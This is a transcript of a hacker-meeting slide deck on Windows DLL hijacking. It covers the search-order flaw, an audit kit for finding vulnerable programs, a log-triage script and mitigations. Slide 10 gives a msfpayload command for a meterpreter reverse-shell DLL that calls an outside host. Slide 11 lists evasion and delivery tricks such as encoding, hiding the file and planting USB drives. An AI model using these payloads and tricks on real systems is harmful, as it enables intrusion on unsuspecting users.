Dll hijacking
DLL Hijacking over view and demo presentation presented at the October Rochester 2600 meeting.
Published in: Technology
Transcript

  • 1. How To Become a Hijacking Terrorist
    DLL Hijacking for fun and profit
  • 2. DLL Hijacking Overview
    DLL Hijacking: trick a program into loading a malicious DLL in place of the DLL it expects
    HDM (H.D. Moore) showed that when a file is opened through its file association, the directory containing that file becomes the handling program's current working directory, and Windows includes the current working directory in its DLL search order. Any DLL the program requests by bare name that is not present in the application's own directory or the system directories is therefore resolved from the directory of the opened file, so an attacker who ships a same-named DLL next to the document gets it loaded.
  • 3. PCAP Example - Normal
  • 4. PCAP Example - Hijacked
  • 5. DLL Hijacking
    Old trick – new dog
    Linux removed "." from $PATH for the same reason
    Delivery: client side, WebDAV, or a remote SMB share
    Widely exploitable
    Easy to detect
  • 6. DLLHijackAuditKit
    Automates the detection
    Generates a test scenario for each registered file extension and automatically creates an exploitable file
    Searches every extension
  • 7. Demo
  • 8. Audit.js
    Download Process Monitor (procmon) from Sysinternals
    Opens procmon with a filter for operations whose names begin with "IRP_MJ_" or "FASTIO_" (procmon's advanced-output names for the file-system operations, which include the file-open probes made while loading a DLL)
    Uses WMI to query the local system for every file extension that has a registered handler
    Generates a test case per extension: a dummy file containing the word "Howdy..." and named after the extension under test
    Opens each file from the command line so the registered handler launches
    While the handler runs, procmon logs its file-system activity
    Waits a few seconds, closes the program and moves on to the next file
    When every extension has been tried, save the procmon capture as LogFile.csv. Each line pairs the executable that handled the file with the path where it looked for a DLL.
  • 9. Analyze.js
    Parses LogFile.csv for each executable and the DLL it went looking for (e.g. wireshark.exe and airpcap.dll)
    Generates a test scenario for each pair and copies in a dummy DLL named after the real DLL the program was looking for
    Runs the file again
    If the hijack works, the dummy DLL, on being loaded, creates a text file named exploit.txt
    Repeat for each EXE/DLL pair to verify which are actively exploitable
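The LogFile.csv analysis step, as an added example (this is not the kit's Analyze.js, which runs as JScript under Windows Script Host): a Python script that reads a Process Monitor CSV export and lists every EXE/DLL pair where the handler probed the test directory for a DLL that was not there, which is exactly the condition the next slide's dummy-DLL re-run confirms. The column names follow procmon's default CSV export; the accepted operation names ("CreateFile", "IRP_MJ_CREATE", "FASTIO_"), the test directory C:\dllaudit\test and the log lines themselves are assumptions constructed for the example, not a real capture.

```python
"""Triage a Process Monitor CSV export for DLL-hijack candidates.

Added example, not code from the DLLHijackAuditKit.  Assumptions:
  * LogFile.csv is procmon's CSV export with the default columns
    "Time of Day","Process Name","PID","Operation","Path","Result","Detail".
  * File-open probes appear as "CreateFile" or, with advanced output on,
    "IRP_MJ_CREATE"; "FASTIO_" operations are accepted as well.
  * TEST_DIR is the folder holding the dummy files, which is the handler's
    current working directory when the file association fires.
"""
import csv
import io
from collections import defaultdict

# procmon Result values meaning "the DLL is not at this location".
NOT_FOUND = {"NAME NOT FOUND", "PATH NOT FOUND"}
OPEN_OPS = ("CreateFile", "IRP_MJ_CREATE", "FASTIO_")

# Constructed sample log (not a real capture): wireshark.exe walks the search
# order for the optional airpcap.dll, misses everywhere, and probes the test
# directory on the way; libwireshark.dll and ole32.dll are found normally.
SAMPLE_LOG = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"1:02:03.1 PM","wireshark.exe","1234","CreateFile","C:\Program Files\Wireshark\airpcap.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"1:02:03.2 PM","wireshark.exe","1234","CreateFile","C:\Windows\System32\airpcap.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"1:02:03.3 PM","wireshark.exe","1234","CreateFile","C:\Windows\System\airpcap.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"1:02:03.4 PM","wireshark.exe","1234","CreateFile","C:\Windows\airpcap.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"1:02:03.5 PM","wireshark.exe","1234","CreateFile","C:\dllaudit\test\airpcap.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"1:02:03.6 PM","wireshark.exe","1234","CreateFile","C:\Program Files\Wireshark\libwireshark.dll","SUCCESS","Desired Access: Read Data/List Directory, Execute/Traverse"
"1:02:03.7 PM","wireshark.exe","1234","ReadFile","C:\dllaudit\test\test.pcap","SUCCESS","Offset: 0, Length: 4,096"
"1:02:04.0 PM","notepad.exe","2345","CreateFile","C:\Windows\System32\ole32.dll","SUCCESS","Desired Access: Read Data/List Directory, Execute/Traverse"
'''

TEST_DIR = r"C:\dllaudit\test"  # assumed location of the dummy test files


def split_path(path):
    """Split a Windows path into (directory, file name), both lower-cased.
    Done by hand so the script also runs on a non-Windows analysis box."""
    head, _, tail = path.rpartition("\\")
    return head.lower(), tail.lower()


def find_candidates(csv_text, test_dir):
    """Return {(process, dll): [directories probed, in order]} for every DLL
    that a process tried to open in test_dir and did not find there.

    That is the hijack condition: the loader consulted the document's
    directory, so a same-named DLL dropped there wins over any later
    location (or over an outright load failure, as with airpcap.dll).
    """
    test_dir = test_dir.lower().rstrip("\\")
    probes = defaultdict(list)  # (process, dll) -> [(directory, result), ...]
    for row in csv.DictReader(io.StringIO(csv_text)):
        if not row["Operation"].startswith(OPEN_OPS):
            continue
        directory, name = split_path(row["Path"])
        if not name.endswith(".dll"):
            continue
        probes[(row["Process Name"].lower(), name)].append((directory, row["Result"]))

    candidates = {}
    for key, seq in probes.items():
        if any(d == test_dir and r in NOT_FOUND for d, r in seq):
            candidates[key] = [d for d, _ in seq]
    return candidates


def report(candidates):
    """One line per EXE/DLL pair, ready for the dummy-DLL re-run step."""
    return [
        f"{process} looks for {dll} in {len(dirs)} places, including the CWD"
        for (process, dll), dirs in sorted(candidates.items())
    ]


if __name__ == "__main__":
    for line in report(find_candidates(SAMPLE_LOG, TEST_DIR)):
        print(line)
```

Point it at a real export with `find_candidates(open("LogFile.csv").read(), r"C:\path\to\testdir")`; libwireshark.dll and ole32.dll are correctly left out because they were found before the loader ever reached the current working directory.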
  • 10. Real World Attack Scenario
    Generate the payload: msfpayload windows/meterpreter/reverse_tcp LHOST=66.66.66.66 LPORT=4242 D > exploit.dll
    Rename it to the DLL name the EXE is looking for
    Put the DLL in the same folder as a file with an associated extension
    Deliver the file and the DLL together
  • 11. Tricks
    Set the Hidden attribute on the DLL
    Bury it among lots of other files
    Encode the payload with msfencode
    Create a link (shortcut) to a subfolder
    Road apples (planted USB drives)
    Host an SMB share on the Internet
    Create a WebDAV share
  • 12. Mitigation
    Admins:
      Microsoft update that lets you block illegal DLL references: http://support.microsoft.com/kb/2264107 (introduces the CWDIllegalInDllSearch registry value)
      CWDIllegalInDllSearch registry value: removes the current working directory from the DLL search order, system-wide or per application, or only when the CWD is a remote WebDAV/UNC location
      Disable WebDAV (the WebClient service)
      Block outbound SMB (TCP 139 and 445) at the perimeter
    Developers:
      Load DLLs securely: load by fully qualified path, and call SetDllDirectory("") so the current working directory is never searched
  • 13. References
    http://www.microsoft.com/technet/security/advisory/2269637.mspx
    http://blog.metasploit.com/2010/08/better-faster-stronger.html
  • 14. 0day (AFAIK)
    RDP .dll
